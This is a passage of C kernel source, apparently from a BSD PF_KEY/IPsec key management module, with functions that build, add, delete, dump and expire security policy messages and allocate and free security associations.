/* sanity check. */ if (sp == NULL) panic("key_sp2msg: NULL pointer was passed.\n"); tlen = key_getspreqmsglen(sp); m = key_alloc_mbuf(tlen); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } m->m_len = tlen; m->m_next = NULL; xpl = mtod(m, struct sadb_x_policy *); bzero(xpl, tlen); xpl->sadb_x_policy_len = PFKEY_UNIT64(tlen); xpl->sadb_x_policy_exttype = SADB_X_EXT_POLICY; xpl->sadb_x_policy_type = sp->policy; xpl->sadb_x_policy_dir = sp->spidx.dir; xpl->sadb_x_policy_id = sp->id; p = (caddr_t)xpl + sizeof(*xpl); /* if is the policy for ipsec ? */ if (sp->policy == IPSEC_POLICY_IPSEC) { struct sadb_x_ipsecrequest *xisr; struct ipsecrequest *isr; for (isr = sp->req; isr != NULL; isr = isr->next) { xisr = (struct sadb_x_ipsecrequest *)p; xisr->sadb_x_ipsecrequest_proto = isr->saidx.proto; xisr->sadb_x_ipsecrequest_mode = isr->saidx.mode; xisr->sadb_x_ipsecrequest_level = isr->level; xisr->sadb_x_ipsecrequest_reqid = isr->saidx.reqid; p += sizeof(*xisr); bcopy(&isr->saidx.src, p, isr->saidx.src.sa.sa_len); p += isr->saidx.src.sa.sa_len; bcopy(&isr->saidx.dst, p, isr->saidx.dst.sa.sa_len); p += isr->saidx.src.sa.sa_len; xisr->sadb_x_ipsecrequest_len = PFKEY_ALIGN8(sizeof(*xisr) + isr->saidx.src.sa.sa_len + isr->saidx.dst.sa.sa_len); } } return m; } /* m will not be freed nor modified */ static struct mbuf * key_gather_mbuf(struct mbuf *m, const struct sadb_msghdr *mhp, int ndeep, int nitem, ...) { __va_list ap; int idx; int i; struct mbuf *result = NULL, *n; int len; if (m == NULL || mhp == NULL) panic("null pointer passed to key_gather"); __va_start(ap, nitem); for (i = 0; i < nitem; i++) { idx = __va_arg(ap, int); if (idx < 0 || idx > SADB_EXT_MAX) goto fail; /* don't attempt to pull empty extension */ if (idx == SADB_EXT_RESERVED && mhp->msg == NULL) continue; if (idx != SADB_EXT_RESERVED && (mhp->ext[idx] == NULL || mhp->extlen[idx] == 0)) continue; if (idx == SADB_EXT_RESERVED) { len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); #ifdef DIAGNOSTIC if (len > MHLEN) panic("assumption failed"); #endif MGETHDR(n, MB_DONTWAIT, MT_DATA); if (!n) goto fail; n->m_len = len; n->m_next = NULL; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); } else if (i < ndeep) { len = mhp->extlen[idx]; n = key_alloc_mbuf(len); if (!n || n->m_next) { /*XXX*/ if (n) m_freem(n); goto fail; } m_copydata(m, mhp->extoff[idx], mhp->extlen[idx], mtod(n, caddr_t)); } else { n = m_copym(m, mhp->extoff[idx], mhp->extlen[idx], MB_DONTWAIT); } if (n == NULL) goto fail; if (result) m_cat(result, n); else result = n; } __va_end(ap); if (result->m_flags & M_PKTHDR) result->m_pkthdr.len = m_lengthm(result, NULL); return result; fail: m_freem(result); return NULL; } /* * SADB_X_SPDADD, SADB_X_SPDSETIDX or SADB_X_SPDUPDATE processing * add an entry to SP database, when received * <base, address(SD), (lifetime(H),) policy> * from the user(?). * Adding to SP database, * and send * <base, address(SD), (lifetime(H),) policy> * to the socket which was send. * * SPDADD set a unique policy entry. * SPDSETIDX like SPDADD without a part of policy requests. * SPDUPDATE replace a unique policy entry. * * m will always be freed. */ static int key_spdadd(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_address *src0, *dst0; struct sadb_x_policy *xpl0, *xpl; struct sadb_lifetime *lft = NULL; struct secpolicyindex spidx; struct secpolicy *newsp; struct sockaddr *saddr, *daddr; int error; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdadd: NULL pointer is passed.\n"); if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || mhp->ext[SADB_X_EXT_POLICY] == NULL) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->ext[SADB_EXT_LIFETIME_HARD] != NULL) { if (mhp->extlen[SADB_EXT_LIFETIME_HARD] < sizeof(struct sadb_lifetime)) { ipseclog((LOG_DEBUG, "key_spdadd: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } lft = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_HARD]; } src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; xpl0 = (struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY]; /* make secindex */ /* XXX boundary check against sa_len */ KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir, src0 + 1, dst0 + 1, src0->sadb_address_prefixlen, dst0->sadb_address_prefixlen, src0->sadb_address_proto, &spidx); /* checking the direciton. */ switch (xpl0->sadb_x_policy_dir) { case IPSEC_DIR_INBOUND: case IPSEC_DIR_OUTBOUND: break; default: ipseclog((LOG_DEBUG, "key_spdadd: Invalid SP direction.\n")); mhp->msg->sadb_msg_errno = EINVAL; return 0; } /* check policy */ /* key_spdadd() accepts DISCARD, NONE and IPSEC. */ if (xpl0->sadb_x_policy_type == IPSEC_POLICY_ENTRUST || xpl0->sadb_x_policy_type == IPSEC_POLICY_BYPASS) { ipseclog((LOG_DEBUG, "key_spdadd: Invalid policy type.\n")); return key_senderror(so, m, EINVAL); } /* policy requests are mandatory when action is ipsec. */ if (mhp->msg->sadb_msg_type != SADB_X_SPDSETIDX && xpl0->sadb_x_policy_type == IPSEC_POLICY_IPSEC && mhp->extlen[SADB_X_EXT_POLICY] <= sizeof(*xpl0)) { ipseclog((LOG_DEBUG, "key_spdadd: some policy requests part required.\n")); return key_senderror(so, m, EINVAL); } /* * checking there is SP already or not. * SPDUPDATE doesn't depend on whether there is a SP or not. * If the type is either SPDADD or SPDSETIDX AND a SP is found, * then error. */ newsp = key_getsp(&spidx); if (mhp->msg->sadb_msg_type == SADB_X_SPDUPDATE) { if (newsp) { newsp->state = IPSEC_SPSTATE_DEAD; KEY_FREESP(&newsp); } } else { if (newsp != NULL) { KEY_FREESP(&newsp); ipseclog((LOG_DEBUG, "key_spdadd: a SP entry exists already.\n")); return key_senderror(so, m, EEXIST); } } /* allocation new SP entry */ if ((newsp = key_msg2sp(xpl0, PFKEY_EXTLEN(xpl0), &error)) == NULL) { return key_senderror(so, m, error); } if ((newsp->id = key_getnewspid()) == 0) { KFREE(newsp); return key_senderror(so, m, ENOBUFS); } /* XXX boundary check against sa_len */ KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir, src0 + 1, dst0 + 1, src0->sadb_address_prefixlen, dst0->sadb_address_prefixlen, src0->sadb_address_proto, &newsp->spidx); /* sanity check on addr pair */ saddr = (struct sockaddr *)(src0 + 1); daddr = (struct sockaddr *)(dst0 + 1); if (saddr->sa_family != daddr->sa_family) { KFREE(newsp); return key_senderror(so, m, EINVAL); } if (saddr->sa_len != daddr->sa_len) { KFREE(newsp); return key_senderror(so, m, EINVAL); } #if 1 if (newsp->req && newsp->req->saidx.src.sa.sa_family) { if (saddr->sa_family != newsp->req->saidx.src.sa.sa_family) { KFREE(newsp); return key_senderror(so, m, EINVAL); } } if (newsp->req && newsp->req->saidx.dst.sa.sa_family) { if (daddr->sa_family != newsp->req->saidx.dst.sa.sa_family) { KFREE(newsp); return key_senderror(so, m, EINVAL); } } #endif newsp->created = time_second; newsp->lastused = newsp->created; newsp->lifetime = lft ? lft->sadb_lifetime_addtime : 0; newsp->validtime = lft ? lft->sadb_lifetime_usetime : 0; newsp->refcnt = 1; /* do not reclaim until I say I do */ newsp->state = IPSEC_SPSTATE_ALIVE; LIST_INSERT_TAIL(&sptree[newsp->spidx.dir], newsp, secpolicy, chain); /* delete the entry in spacqtree */ if (mhp->msg->sadb_msg_type == SADB_X_SPDUPDATE) { struct secspacq *spacq; if ((spacq = key_getspacq(&spidx)) != NULL) { /* reset counter in order to deletion by timehandler. */ spacq->created = time_second; spacq->count = 0; } } { struct mbuf *n, *mpolicy; struct sadb_msg *newmsg; int off; /* create new sadb_msg to reply. */ if (lft) { n = key_gather_mbuf(m, mhp, 2, 5, SADB_EXT_RESERVED, SADB_X_EXT_POLICY, SADB_EXT_LIFETIME_HARD, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); } else { n = key_gather_mbuf(m, mhp, 2, 4, SADB_EXT_RESERVED, SADB_X_EXT_POLICY, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); } if (!n) return key_senderror(so, m, ENOBUFS); if (n->m_len < sizeof(*newmsg)) { n = m_pullup(n, sizeof(*newmsg)); if (!n) return key_senderror(so, m, ENOBUFS); } newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); off = 0; mpolicy = m_pulldown(n, PFKEY_ALIGN8(sizeof(struct sadb_msg)), sizeof(*xpl), &off); if (mpolicy == NULL) { /* n is already freed */ return key_senderror(so, m, ENOBUFS); } xpl = (struct sadb_x_policy *)(mtod(mpolicy, caddr_t) + off); if (xpl->sadb_x_policy_exttype != SADB_X_EXT_POLICY) { m_freem(n); return key_senderror(so, m, EINVAL); } xpl->sadb_x_policy_id = newsp->id; m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * get new policy id. * OUT: * 0: failure. * others: success. */ static u_int32_t key_getnewspid(void) { u_int32_t newid = 0; int count = key_spi_trycnt; /* XXX */ struct secpolicy *sp; /* when requesting to allocate spi ranged */ while (count--) { newid = (policy_id = (policy_id == ~0 ? 1 : policy_id + 1)); if ((sp = key_getspbyid(newid)) == NULL) break; KEY_FREESP(&sp); } if (count == 0 || newid == 0) { ipseclog((LOG_DEBUG, "key_getnewspid: to allocate policy id is failed.\n")); return 0; } return newid; } /* * SADB_SPDDELETE processing * receive * <base, address(SD), policy(*)> * from the user(?), and set SADB_SASTATE_DEAD, * and send, * <base, address(SD), policy(*)> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spddelete(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_address *src0, *dst0; struct sadb_x_policy *xpl0; struct secpolicyindex spidx; struct secpolicy *sp; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddelete: NULL pointer is passed.\n"); if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL || mhp->ext[SADB_EXT_ADDRESS_DST] == NULL || mhp->ext[SADB_X_EXT_POLICY] == NULL) { ipseclog((LOG_DEBUG, "key_spddelete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) || mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spddelete: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC]; dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST]; xpl0 = (struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY]; /* make secindex */ /* XXX boundary check against sa_len */ KEY_SETSECSPIDX(xpl0->sadb_x_policy_dir, src0 + 1, dst0 + 1, src0->sadb_address_prefixlen, dst0->sadb_address_prefixlen, src0->sadb_address_proto, &spidx); /* checking the direciton. */ switch (xpl0->sadb_x_policy_dir) { case IPSEC_DIR_INBOUND: case IPSEC_DIR_OUTBOUND: break; default: ipseclog((LOG_DEBUG, "key_spddelete: Invalid SP direction.\n")); return key_senderror(so, m, EINVAL); } /* Is there SP in SPD ? */ if ((sp = key_getsp(&spidx)) == NULL) { ipseclog((LOG_DEBUG, "key_spddelete: no SP found.\n")); return key_senderror(so, m, EINVAL); } /* save policy id to buffer to be returned. */ xpl0->sadb_x_policy_id = sp->id; sp->state = IPSEC_SPSTATE_DEAD; KEY_FREESP(&sp); { struct mbuf *n; struct sadb_msg *newmsg; /* create new sadb_msg to reply. */ n = key_gather_mbuf(m, mhp, 1, 4, SADB_EXT_RESERVED, SADB_X_EXT_POLICY, SADB_EXT_ADDRESS_SRC, SADB_EXT_ADDRESS_DST); if (!n) return key_senderror(so, m, ENOBUFS); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * SADB_SPDDELETE2 processing * receive * <base, policy(*)> * from the user(?), and set SADB_SASTATE_DEAD, * and send, * <base, policy(*)> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spddelete2(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { u_int32_t id; struct secpolicy *sp; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddelete2: NULL pointer is passed.\n"); if (mhp->ext[SADB_X_EXT_POLICY] == NULL || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spddelete2: invalid message is passed.\n")); key_senderror(so, m, EINVAL); return 0; } id = ((struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY])->sadb_x_policy_id; /* Is there SP in SPD ? */ if ((sp = key_getspbyid(id)) == NULL) { ipseclog((LOG_DEBUG, "key_spddelete2: no SP found id:%u.\n", id)); key_senderror(so, m, EINVAL); } sp->state = IPSEC_SPSTATE_DEAD; KEY_FREESP(&sp); { struct mbuf *n; struct sadb_msg *newmsg; int off, len; /* create new sadb_msg to reply. */ len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); if (len > MCLBYTES) return key_senderror(so, m, ENOBUFS); n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) return key_senderror(so, m, ENOBUFS); n->m_len = len; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); off = PFKEY_ALIGN8(sizeof(struct sadb_msg)); #ifdef DIAGNOSTIC if (off != len) panic("length inconsistency in key_spddelete2"); #endif n->m_next = m_copym(m, mhp->extoff[SADB_X_EXT_POLICY], mhp->extlen[SADB_X_EXT_POLICY], MB_DONTWAIT); if (!n->m_next) { m_freem(n); return key_senderror(so, m, ENOBUFS); } n->m_pkthdr.len = m_lengthm(n, NULL); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(n->m_pkthdr.len); m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ALL); } } /* * SADB_X_GET processing * receive * <base, policy(*)> * from the user(?), * and send, * <base, address(SD), policy> * to the ikmpd. * policy(*) including direction of policy. * * m will always be freed. */ static int key_spdget(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { u_int32_t id; struct secpolicy *sp; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdget: NULL pointer is passed.\n"); if (mhp->ext[SADB_X_EXT_POLICY] == NULL || mhp->extlen[SADB_X_EXT_POLICY] < sizeof(struct sadb_x_policy)) { ipseclog((LOG_DEBUG, "key_spdget: invalid message is passed.\n")); return key_senderror(so, m, EINVAL); } id = ((struct sadb_x_policy *)mhp->ext[SADB_X_EXT_POLICY])->sadb_x_policy_id; /* Is there SP in SPD ? */ if ((sp = key_getspbyid(id)) == NULL) { ipseclog((LOG_DEBUG, "key_spdget: no SP found id:%u.\n", id)); return key_senderror(so, m, ENOENT); } n = key_setdumpsp(sp, SADB_X_SPDGET, 0, mhp->msg->sadb_msg_pid); if (n != NULL) { m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } else return key_senderror(so, m, ENOBUFS); } /* * SADB_X_SPDACQUIRE processing. * Acquire policy and SA(s) for a *OUTBOUND* packet. * send * <base, policy(*)> * to KMD, and expect to receive * <base> with SADB_X_SPDACQUIRE if error occured, * or * <base, policy> * with SADB_X_SPDUPDATE from KMD by PF_KEY. * policy(*) is without policy requests. * * 0 : succeed * others: error number */ int key_spdacquire(struct secpolicy *sp) { struct mbuf *result = NULL, *m; struct secspacq *newspacq; int error; /* sanity check */ if (sp == NULL) panic("key_spdacquire: NULL pointer is passed.\n"); if (sp->req != NULL) panic("key_spdacquire: called but there is request.\n"); if (sp->policy != IPSEC_POLICY_IPSEC) panic("key_spdacquire: policy mismatched. IPsec is expected.\n"); /* Get an entry to check whether sent message or not. */ if ((newspacq = key_getspacq(&sp->spidx)) != NULL) { if (key_blockacq_count < newspacq->count) { /* reset counter and do send message. */ newspacq->count = 0; } else { /* increment counter and do nothing. */ newspacq->count++; return 0; } } else { /* make new entry for blocking to send SADB_ACQUIRE. */ if ((newspacq = key_newspacq(&sp->spidx)) == NULL) return ENOBUFS; /* add to acqtree */ LIST_INSERT_HEAD(&spacqtree, newspacq, chain); } /* create new sadb_msg to reply. */ m = key_setsadbmsg(SADB_X_SPDACQUIRE, 0, 0, 0, 0, 0); if (!m) { error = ENOBUFS; goto fail; } result = m; result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return key_sendup_mbuf(NULL, m, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); return error; } /* * SADB_SPDFLUSH processing * receive * <base> * from the user, and free all entries in secpctree. * and send, * <base> * to the user. * NOTE: what to do is only marking SADB_SASTATE_DEAD. * * m will always be freed. */ static int key_spdflush(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct sadb_msg *newmsg; struct secpolicy *sp; u_int dir; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spdflush: NULL pointer is passed.\n"); if (m->m_len != PFKEY_ALIGN8(sizeof(struct sadb_msg))) return key_senderror(so, m, EINVAL); for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { sp->state = IPSEC_SPSTATE_DEAD; } } if (sizeof(struct sadb_msg) > m->m_len + M_TRAILINGSPACE(m)) { ipseclog((LOG_DEBUG, "key_spdflush: No more memory.\n")); return key_senderror(so, m, ENOBUFS); } if (m->m_next) m_freem(m->m_next); m->m_next = NULL; m->m_pkthdr.len = m->m_len = PFKEY_ALIGN8(sizeof(struct sadb_msg)); newmsg = mtod(m, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(m->m_pkthdr.len); return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } /* * SADB_SPDDUMP processing * receive * <base> * from the user, and dump all SP leaves * and send, * <base> ..... * to the ikmpd. * * m will always be freed. */ static int key_spddump(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct secpolicy *sp; int cnt; u_int dir; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_spddump: NULL pointer is passed.\n"); /* search SPD entry and get buffer size. */ cnt = 0; for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { cnt++; } } if (cnt == 0) return key_senderror(so, m, ENOENT); for (dir = 0; dir < IPSEC_DIR_MAX; dir++) { LIST_FOREACH(sp, &sptree[dir], chain) { --cnt; n = key_setdumpsp(sp, SADB_X_SPDDUMP, cnt, mhp->msg->sadb_msg_pid); if (n) key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } m_freem(m); return 0; } static struct mbuf * key_setdumpsp(struct secpolicy *sp, u_int8_t type, u_int32_t seq, u_int32_t pid) { struct mbuf *result = NULL, *m; m = key_setsadbmsg(type, 0, SADB_SATYPE_UNSPEC, seq, pid, sp->refcnt); if (!m) goto fail; result = m; m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sp->spidx.src.sa, sp->spidx.prefs, sp->spidx.ul_proto); if (!m) goto fail; m_cat(result, m); m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sp->spidx.dst.sa, sp->spidx.prefd, sp->spidx.ul_proto); if (!m) goto fail; m_cat(result, m); m = key_sp2msg(sp); if (!m) goto fail; m_cat(result, m); if ((result->m_flags & M_PKTHDR) == 0) goto fail; if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) goto fail; } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return result; fail: m_freem(result); return NULL; } /* * get PFKEY message length for security policy and request. */ static u_int key_getspreqmsglen(struct secpolicy *sp) { struct ipsecrequest *isr; u_int tlen, len; tlen = sizeof(struct sadb_x_policy); /* if is the policy for ipsec ? */ if (sp->policy != IPSEC_POLICY_IPSEC) return tlen; /* get length of ipsec requests */ for (isr = sp->req; isr != NULL; isr = isr->next) { len = sizeof(struct sadb_x_ipsecrequest) + isr->saidx.src.sa.sa_len + isr->saidx.dst.sa.sa_len; tlen += PFKEY_ALIGN8(len); } return tlen; } /* * SADB_SPDEXPIRE processing * send * <base, address(SD), lifetime(CH), policy> * to KMD by PF_KEY. * * OUT: 0 : succeed * others : error number */ static int key_spdexpire(struct secpolicy *sp) { struct mbuf *result = NULL, *m; int len; int error = -1; struct sadb_lifetime *lt; /* XXX: Why do we lock ? */ crit_enter(); /* sanity check */ if (sp == NULL) panic("key_spdexpire: NULL pointer is passed.\n"); /* set msg header */ m = key_setsadbmsg(SADB_X_SPDEXPIRE, 0, 0, 0, 0, 0); if (!m) { error = ENOBUFS; goto fail; } result = m; /* create lifetime extension (current and hard) */ len = PFKEY_ALIGN8(sizeof(*lt)) * 2; m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); error = ENOBUFS; goto fail; } bzero(mtod(m, caddr_t), len); lt = mtod(m, struct sadb_lifetime *); lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT; lt->sadb_lifetime_allocations = 0; lt->sadb_lifetime_bytes = 0; lt->sadb_lifetime_addtime = sp->created; lt->sadb_lifetime_usetime = sp->lastused; lt = (struct sadb_lifetime *)(mtod(m, caddr_t) + len / 2); lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime)); lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_HARD; lt->sadb_lifetime_allocations = 0; lt->sadb_lifetime_bytes = 0; lt->sadb_lifetime_addtime = sp->lifetime; lt->sadb_lifetime_usetime = sp->validtime; m_cat(result, m); /* set sadb_address for source */ m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC, &sp->spidx.src.sa, sp->spidx.prefs, sp->spidx.ul_proto); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* set sadb_address for destination */ m = key_setsadbaddr(SADB_EXT_ADDRESS_DST, &sp->spidx.dst.sa, sp->spidx.prefd, sp->spidx.ul_proto); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* set secpolicy */ m = key_sp2msg(sp); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); if ((result->m_flags & M_PKTHDR) == 0) { error = EINVAL; goto fail; } if (result->m_len < sizeof(struct sadb_msg)) { result = m_pullup(result, sizeof(struct sadb_msg)); if (result == NULL) { error = ENOBUFS; goto fail; } } result->m_pkthdr.len = m_lengthm(result, NULL); mtod(result, struct sadb_msg *)->sadb_msg_len = PFKEY_UNIT64(result->m_pkthdr.len); return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED); fail: if (result) m_freem(result); crit_exit(); return error; } /* %%% SAD management */ /* * allocating a memory for new SA head, and copy from the values of mhp. * OUT: NULL : failure due to the lack of memory. * others : pointer to new SA head. */ static struct secashead * key_newsah(struct secasindex *saidx) { struct secashead *newsah; KASSERT(saidx != NULL, ("key_newsaidx: null saidx")); newsah = kmalloc(sizeof(struct secashead), M_SECA, M_INTWAIT | M_ZERO | M_NULLOK); if (newsah != NULL) { int i; for (i = 0; i < NELEM(newsah->savtree); i++) LIST_INIT(&newsah->savtree[i]); newsah->saidx = *saidx; /* add to saidxtree */ newsah->state = SADB_SASTATE_MATURE; LIST_INSERT_HEAD(&sahtree, newsah, chain); } return(newsah); } /* * Delete SA index and all registered SAs. */ static void key_delsah(struct secashead *sah) { struct secasvar *sav, *nextsav; u_int stateidx; int nzombies = 0; /* sanity check */ if (sah == NULL) panic("key_delsah: NULL pointer is passed.\n"); crit_enter(); /* searching all SA registerd in the secindex. */ for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { u_int state = saorder_state_any[stateidx]; LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) if (sav->refcnt == 0) { /* sanity check */ KEY_CHKSASTATE(state, sav->state, __func__); KEY_FREESAV(&sav); } else { /* give up to delete this SA */ nzombies++; } } /* Delete sah it has are no savs. */ if (nzombies == 0) { /* remove from tree of SA index */ if (__LIST_CHAINED(sah)) LIST_REMOVE(sah, chain); if (sah->sa_route.ro_rt) { RTFREE(sah->sa_route.ro_rt); sah->sa_route.ro_rt = NULL; } KFREE(sah); } crit_exit(); return; } /* * allocating a new SA with LARVAL state. key_add() and key_getspi() call, * and copy the values of mhp into new buffer. * When SAD message type is GETSPI: * to set sequence number from acq_seq++, * to set zero to SPI. * not to call key_setsava(). * OUT: NULL : fail * others : pointer to new secasvar. * * does not modify mbuf. does not free mbuf on error. */ static struct secasvar * key_newsav(struct mbuf *m, const struct sadb_msghdr *mhp, struct secashead *sah, int *errp, const char *where, int tag) { struct secasvar *newsav; const struct sadb_sa *xsa; /* sanity check */ if (m == NULL || mhp == NULL || mhp->msg == NULL || sah == NULL) panic("key_newsa: NULL pointer is passed.\n"); KMALLOC(newsav, struct secasvar *, sizeof(struct secasvar)); if (newsav == NULL) { ipseclog((LOG_DEBUG, "key_newsa: No more memory.\n")); *errp = ENOBUFS; goto done; } bzero((caddr_t)newsav, sizeof(struct secasvar)); switch (mhp->msg->sadb_msg_type) { case SADB_GETSPI: newsav->spi = 0; #ifdef IPSEC_DOSEQCHECK /* sync sequence number */ if (mhp->msg->sadb_msg_seq == 0) newsav->seq = (acq_seq = (acq_seq == ~0 ? 1 : ++acq_seq)); else #endif newsav->seq = mhp->msg->sadb_msg_seq; break; case SADB_ADD: /* sanity check */ if (mhp->ext[SADB_EXT_SA] == NULL) { KFREE(newsav), newsav = NULL; ipseclog((LOG_DEBUG, "key_newsa: invalid message is passed.\n")); *errp = EINVAL; goto done; } xsa = (const struct sadb_sa *)mhp->ext[SADB_EXT_SA]; newsav->spi = xsa->sadb_sa_spi; newsav->seq = mhp->msg->sadb_msg_seq; break; default: KFREE(newsav), newsav = NULL; *errp = EINVAL; goto done; } /* copy sav values */ if (mhp->msg->sadb_msg_type != SADB_GETSPI) { *errp = key_setsaval(newsav, m, mhp); if (*errp) { KFREE(newsav), newsav = NULL; goto done; } } /* reset created */ newsav->created = time_second; newsav->pid = mhp->msg->sadb_msg_pid; /* add to satree */ newsav->sah = sah; newsav->refcnt = 1; newsav->state = SADB_SASTATE_LARVAL; LIST_INSERT_TAIL(&sah->savtree[SADB_SASTATE_LARVAL], newsav, secasvar, chain); done: KEYDEBUG(KEYDEBUG_IPSEC_STAMP, kprintf("DP key_newsav from %s:%u return SP:%p\n", where, tag, newsav)); return newsav; } /* * free() SA variable entry. */ static void key_delsav(struct secasvar *sav) { KASSERT(sav != NULL, ("key_delsav: null sav")); KASSERT(sav->refcnt == 0, ("key_delsav: reference count %u > 0", sav->refcnt)); /* remove from SA header */ if (__LIST_CHAINED(sav)) LIST_REMOVE(sav, chain); /* * Cleanup xform state. Note that zeroize'ing causes the * keys to be cleared; otherwise we must do it ourself. */ if (sav->tdb_xform != NULL) { sav->tdb_xform->xf_zeroize(sav); sav->tdb_xform = NULL; } else { if (sav->key_auth != NULL) bzero(_KEYBUF(sav->key_auth), _KEYLEN(sav->key_auth)); if (sav->key_enc != NULL) bzero(_KEYBUF(sav->key_enc), _KEYLEN(sav->key_enc)); } if (sav->key_auth != NULL) { KFREE(sav->key_auth); sav->key_auth = NULL; } if (sav->key_enc != NULL) { KFREE(sav->key_enc); sav->key_enc = NULL; } if (sav->sched) { bzero(sav->sched, sav->schedlen); KFREE(sav->sched); sav->sched = NULL; } if (sav->replay != NULL) { KFREE(sav->replay); sav->replay = NULL; } if (sav->lft_c != NULL) { KFREE(sav->lft_c); sav->lft_c = NULL; } if (sav->lft_h != NULL) { KFREE(sav->lft_h); sav->lft_h = NULL; } if (sav->lft_s != NULL) { KFREE(sav->lft_s); sav->lft_s = NULL; } if (sav->iv != NULL) { KFREE(sav->iv); sav->iv = NULL; } KFREE(sav); return; } /* * search SAD. * OUT: * NULL : not found * others : found, pointer to a SA. */ static struct secashead * key_getsah(struct secasindex *saidx) { struct secashead *sah; LIST_FOREACH(sah, &sahtree, chain) { if (sah->state == 